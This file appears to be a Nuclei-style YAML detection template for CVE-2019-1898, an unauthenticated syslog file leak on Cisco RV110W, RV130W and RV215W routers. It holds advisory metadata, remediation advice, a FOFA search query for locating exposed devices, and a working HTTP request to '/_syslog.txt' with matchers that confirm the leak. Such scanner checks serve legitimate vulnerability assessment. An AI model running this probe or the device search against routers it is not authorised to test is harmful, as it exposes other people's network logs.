47 lines
2.0 KiB
YAML
47 lines
2.0 KiB
YAML
id: CVE-2019-1898
|
|
|
|
info:
|
|
name: Cisco RV110W RV130W RV215W Router - Information leakage
|
|
author: SleepingBag945
|
|
severity: medium
|
|
description: |
|
|
A vulnerability in the web-based management interface of Cisco RV110W, RV130W, and RV215W Routers could allow an unauthenticated, remote attacker to access the syslog file on an affected device. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing the URL for the syslog file. A successful exploit could allow the attacker to access the information contained in the file.
|
|
impact: |
|
|
An attacker can exploit this vulnerability to gain sensitive information from the router.
|
|
remediation: |
|
|
Apply the latest firmware update provided by Cisco to fix the vulnerability.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-1898
|
|
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190619-rv-fileaccess
|
|
- https://www.tenable.com/security/research/tra-2019-29
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2019-1898
|
|
cwe-id: CWE-425,CWE-285
|
|
epss-score: 0.07254
|
|
epss-percentile: 0.93337
|
|
cpe: cpe:2.3:o:cisco:rv110w_firmware:-:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: cisco
|
|
product: rv110w_firmware
|
|
fofa-query: icon_hash="-646322113"
|
|
tags: cve,cve2019,cisco,router,iot
|
|
|
|
http:
|
|
- method: POST
|
|
path:
|
|
- '{{BaseURL}}/_syslog.txt'
|
|
|
|
headers:
|
|
Content-Type: application/x-www-form-urlencoded
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(to_lower(body), "ethernet") && contains(to_lower(body), "connection")'
|
|
- 'contains(header, "application/octet-stream")'
|
|
condition: and
|
|
# digest: 490a004630440220244f92404a070a423a8d23116d8ec6520e0de53df4cea43b584f5f8c4cd08a8702200b32e61f01df37b00cec3391b245e871cfae53f43f3f65be7960960574a122b5:922c64590222798bb761d5b6d8e72950 |